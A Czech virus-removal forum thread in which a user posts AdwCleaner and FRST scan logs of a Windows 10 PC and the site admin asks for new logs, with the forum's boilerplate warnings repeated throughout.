Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu
Tady je log .
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 9
# Failed: 1
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
No malicious folders cleaned.
***** [ Files ] *****
No malicious files cleaned.
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
No malicious registry entries cleaned.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
Deleted BS Player Customized Web Search
Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Not Deleted WebSearch
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########
# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 9
# Failed: 1
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
No malicious folders cleaned.
***** [ Files ] *****
No malicious files cleaned.
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
No malicious registry entries cleaned.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
Deleted BS Player Customized Web Search
Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Not Deleted WebSearch
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
No Preinstalled Software cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########
-
Rudy
- Site Admin
- Příspěvky: 118371
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Prosím o kontrolu logu
Dejte nové logy FRST+Addition.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Prosím o kontrolu logu
FRST log
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 18:40:54)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]
FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 18:40 - 2021-01-20 18:41 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
